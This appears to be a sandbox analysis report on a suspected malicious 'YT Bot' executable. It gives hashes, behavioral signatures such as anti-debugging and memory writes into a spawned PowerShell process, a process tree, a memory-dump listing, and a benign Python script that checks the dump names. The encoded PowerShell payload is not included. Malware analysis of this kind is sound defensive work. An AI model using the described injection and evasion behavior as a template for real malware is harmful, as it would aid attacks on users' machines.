Analysis
- max time kernel: 149s
- max time network: 52s
- platform: windows11-21h2_x64
- resource: win11-20240508-en
- resource tags: arch:x64, arch:x86, image:win11-20240508-en, locale:en-us, os:windows11-21h2-x64, system
- submitted: 18-06-2024 14:39
Static task
- static1

Behavioral tasks
- behavioral1: YT Bot/Leaf.xNet.dll on win11-20240611-en
- behavioral2: YT Bot/YT_Bot.exe on win11-20240508-en
- behavioral3: YT Bot/Youtube-Viewers.exe.config on win11-20240611-en
- behavioral4: YT Bot/Youtube-Viewers.pdb on win11-20240508-en

The submission is a four-file bundle under "YT Bot/": the executable, Leaf.xNet.dll (a .NET HTTP client library), a .NET application config and a debug-symbol file. Note that the config and symbol files are named Youtube-Viewers while the executable is named YT_Bot.exe. The General, Signatures, Processes and Downloads sections below cover behavioral2, the run of YT_Bot.exe on win11-20240508-en.
General
- Target: YT Bot/YT_Bot.exe
- Size: 2.4MB
- MD5: 240b2940002c38ebb3df80246920a729
- SHA1: ecb8fcaf0babe0f000b5f7cceadfb9bc033d0467
- SHA256: 552a0e05f9fe148b38b8cd34f4dc699654feb0fb98584d5506001742a4d4bb0d
- SHA512: d5448e5b3507ac5008ca405c90e7fec49f4594b919677cf4bbe9cd7faabda1ef02713b9a88bf69bc9f21bf986ba9411929e7f2f17cacc083e7af046f037297d1
- SSDEEP: 49152:KyAKtpUvBE36OzFna+zSZt0zXxxqY95TmPZjQ5897e9zVfzlD3VtOr8c5n:KyAK7UC6OpacKul8dQ5897mdlP25
Malware Config
Signatures
- Suspicious use of NtSetInformationThreadHideFromDebugger (1 IoC)
  Processes: PID 4584 YT_Bot.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes: PID 2880 powershell.exe (2 hits)
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes: PID 2880 powershell.exe, Token: SeDebugPrivilege
- Suspicious use of SetWindowsHookEx (1 IoC)
  Processes: PID 4584 YT_Bot.exe
- Suspicious use of WriteProcessMemory (3 IoCs)
  Processes: PID 4584 YT_Bot.exe wrote to memory of PID 2880 powershell.exe (3 hits)
Processes
1. C:\Users\Admin\AppData\Local\Temp\YT Bot\YT_Bot.exe (PID 4584)
   Command line: "C:\Users\Admin\AppData\Local\Temp\YT Bot\YT_Bot.exe"
   - Suspicious use of NtSetInformationThreadHideFromDebugger
   - Suspicious use of SetWindowsHookEx
   - Suspicious use of WriteProcessMemory
2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2880, child of 4584)
   Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
   - Command and Scripting Interpreter: PowerShell
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious use of AdjustPrivilegeToken

Two points worth noting in this tree. The child's command line names System32, but the image that actually ran is the one under SysWOW64; that redirection only happens to a 32-bit caller, so the parent runs under WoW64 and launched 32-bit PowerShell (consistent with the arch:x86 tag and the 0x00400000 image base seen in the dumps for PID 4584). The -EncodedCommand value was removed from this copy of the report, so the script cannot be recovered from the page; the three WriteProcessMemory hits listed under Signatures are the parent writing into this child.
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
- C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ueqk13ad.rww.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
  A __PSScriptPolicyTest_*.ps1 file is written by powershell.exe itself at startup to probe whether AppLocker/script-enforcement lockdown is in effect. It is a side effect of the PowerShell child running, not content dropped by the sample, so its hashes should not be used as indicators for YT_Bot.exe.
- memory/2880-33-0x0000000006990000-0x00000000069AE000-memory.dmp: 120KB
- memory/2880-52-0x0000000074B70000-0x0000000075321000-memory.dmp: 7.7MB
- memory/2880-55-0x0000000074B70000-0x0000000075321000-memory.dmp: 7.7MB
- memory/2880-34-0x00000000075F0000-0x0000000007694000-memory.dmp: 656KB
- memory/2880-5-0x0000000004F10000-0x0000000004F46000-memory.dmp: 216KB
- memory/2880-6-0x0000000074B70000-0x0000000075321000-memory.dmp: 7.7MB
- memory/2880-7-0x00000000056F0000-0x0000000005D1A000-memory.dmp: 6.2MB
- memory/2880-8-0x0000000074B70000-0x0000000075321000-memory.dmp: 7.7MB
- memory/2880-9-0x0000000005620000-0x0000000005642000-memory.dmp: 136KB
- memory/2880-11-0x0000000005EF0000-0x0000000005F56000-memory.dmp: 408KB
- memory/2880-10-0x0000000005E10000-0x0000000005E76000-memory.dmp: 408KB
- memory/2880-35-0x0000000074B70000-0x0000000075321000-memory.dmp: 7.7MB
- memory/2880-14-0x0000000005F60000-0x00000000062B7000-memory.dmp: 3.3MB
- memory/2880-21-0x00000000063D0000-0x00000000063EE000-memory.dmp: 120KB
- memory/2880-22-0x0000000006460000-0x00000000064AC000-memory.dmp: 304KB
- memory/2880-24-0x0000000070D60000-0x0000000070DAC000-memory.dmp: 304KB
- memory/2880-23-0x00000000075B0000-0x00000000075E4000-memory.dmp: 208KB
- memory/2880-51-0x0000000074B70000-0x0000000075321000-memory.dmp: 7.7MB
- memory/2880-4-0x0000000074B7E000-0x0000000074B7F000-memory.dmp: 4KB
- memory/2880-50-0x0000000074B70000-0x0000000075321000-memory.dmp: 7.7MB
- memory/2880-37-0x0000000007D70000-0x00000000083EA000-memory.dmp: 6.5MB
- memory/2880-36-0x0000000074B70000-0x0000000075321000-memory.dmp: 7.7MB
- memory/2880-38-0x0000000007730000-0x000000000774A000-memory.dmp: 104KB
- memory/2880-39-0x00000000077B0000-0x00000000077BA000-memory.dmp: 40KB
- memory/2880-40-0x00000000079D0000-0x0000000007A66000-memory.dmp: 600KB
- memory/2880-41-0x0000000007940000-0x0000000007951000-memory.dmp: 68KB
- memory/2880-42-0x0000000007970000-0x000000000797E000-memory.dmp: 56KB
- memory/2880-43-0x0000000007980000-0x0000000007995000-memory.dmp: 84KB
- memory/2880-44-0x0000000007A70000-0x0000000007A8A000-memory.dmp: 104KB
- memory/2880-45-0x00000000079C0000-0x00000000079C8000-memory.dmp: 32KB
- memory/2880-46-0x0000000007AC0000-0x0000000007AE2000-memory.dmp: 136KB
- memory/2880-47-0x00000000089A0000-0x0000000008F46000-memory.dmp: 5.6MB
- memory/2880-49-0x0000000074B7E000-0x0000000074B7F000-memory.dmp: 4KB
- memory/4584-2-0x0000000000400000-0x0000000000DDE000-memory.dmp: 9.9MB
- memory/4584-0-0x0000000000400000-0x0000000000DDE000-memory.dmp: 9.9MB
- memory/4584-1-0x000000007FAA0000-0x000000007FE71000-memory.dmp: 3.8MB
- memory/4584-3-0x000000007FAA0000-0x000000007FE71000-memory.dmp: 3.8MB
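The dump names above encode PID, capture index and address range, and the same mapping is captured repeatedly (for PID 2880 the 7.7MB region at 0x74B70000 appears eight times, at indices 6, 8, 35, 36, 50, 51, 52 and 55). The following added example, not part of the sandbox output, parses that naming scheme, checks each reported size against the address range, collapses repeated captures of one region, and finds dumps that fall inside a larger dumped region. The names and sizes in SAMPLE are copied from the listing; the size-formatting rule (whole KB below 1 MiB, one-decimal MB above, both 1024-based) is an assumption inferred from those values.

```python
"""Sanity-check the memory-dump listing in this report: parse each
memory/<pid>-<idx>-0x<start>-0x<end>-memory.dmp name, confirm the reported
size matches the address range, group repeated captures of one region per
PID, and find dumps that lie inside a larger dumped region.

Added example, not part of the sandbox output. The names and sizes in SAMPLE
are copied from the listing above; the size-formatting rule (KB below 1 MiB,
one-decimal MB above, both 1024-based) is an assumption inferred from those
values, not something the report states.
"""
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

DUMP_RE = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<idx>\d+)-"
    r"0x(?P<start>[0-9A-Fa-f]+)-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp$"
)

Region = Tuple[int, int]


def parse_dump_name(name: str) -> Optional[dict]:
    """Fields of one dump name, or None if it is malformed or not page-granular."""
    m = DUMP_RE.match(name)
    if not m:
        return None
    start, end = int(m["start"], 16), int(m["end"], 16)
    if end <= start or start % 0x1000 or end % 0x1000:
        return None
    return {"pid": int(m["pid"]), "idx": int(m["idx"]),
            "start": start, "end": end, "size": end - start}


def fmt_size(nbytes: int) -> str:
    """Assumed report convention: whole KiB under 1 MiB, else MiB to one decimal."""
    if nbytes < (1 << 20):
        return f"{nbytes // 1024}KB"
    return f"{nbytes / (1 << 20):.1f}MB"


def size_matches(name: str, reported: str) -> bool:
    """True when the listed size agrees with end - start."""
    e = parse_dump_name(name)
    return e is not None and fmt_size(e["size"]) == reported


def group_regions(names: List[str]) -> Dict[int, Dict[Region, List[int]]]:
    """pid -> {(start, end): [capture indices]}, so one mapping dumped N times reads as one region."""
    groups: Dict[int, Dict[Region, List[int]]] = defaultdict(lambda: defaultdict(list))
    for n in names:
        e = parse_dump_name(n)
        if e is not None:
            groups[e["pid"]][(e["start"], e["end"])].append(e["idx"])
    return {pid: dict(r) for pid, r in groups.items()}


def nested_regions(regions: Dict[Region, List[int]]) -> List[Region]:
    """Regions entirely inside another region of the same PID (e.g. one 4KB page of a mapped module)."""
    keys = list(regions)
    return [k for k in keys
            if any(o != k and o[0] <= k[0] and k[1] <= o[1] for o in keys)]


# Copied from the listing above (a subset is enough to exercise every path).
SAMPLE = [
    ("memory/2880-33-0x0000000006990000-0x00000000069AE000-memory.dmp", "120KB"),
    ("memory/2880-52-0x0000000074B70000-0x0000000075321000-memory.dmp", "7.7MB"),
    ("memory/2880-6-0x0000000074B70000-0x0000000075321000-memory.dmp", "7.7MB"),
    ("memory/2880-50-0x0000000074B70000-0x0000000075321000-memory.dmp", "7.7MB"),
    ("memory/2880-4-0x0000000074B7E000-0x0000000074B7F000-memory.dmp", "4KB"),
    ("memory/2880-37-0x0000000007D70000-0x00000000083EA000-memory.dmp", "6.5MB"),
    ("memory/4584-2-0x0000000000400000-0x0000000000DDE000-memory.dmp", "9.9MB"),
    ("memory/4584-0-0x0000000000400000-0x0000000000DDE000-memory.dmp", "9.9MB"),
    ("memory/4584-1-0x000000007FAA0000-0x000000007FE71000-memory.dmp", "3.8MB"),
]

if __name__ == "__main__":
    for name, reported in SAMPLE:
        print("ok " if size_matches(name, reported) else "BAD", name, reported)
    for pid, regions in group_regions([n for n, _ in SAMPLE]).items():
        for (start, end), idxs in regions.items():
            print(f"pid {pid}: 0x{start:08X}-0x{end:08X} ({fmt_size(end - start)}) captured at {sorted(idxs)}")
        print(f"pid {pid}: nested regions {nested_regions(regions)}")
```

Two observations fall out of the listing once it is grouped this way. The 4KB dumps 2880-4 and 2880-49 at 0x74B7E000 lie inside the 7.7MB region at 0x74B70000, so they are a single page of that mapping rather than a separate allocation. And for PID 4584 the image region at 0x00400000 is 9.9MB while the file on disk is 2.4MB, so the PE's virtual size is roughly four times its raw size; that is worth checking in the section table before drawing any conclusion about packing.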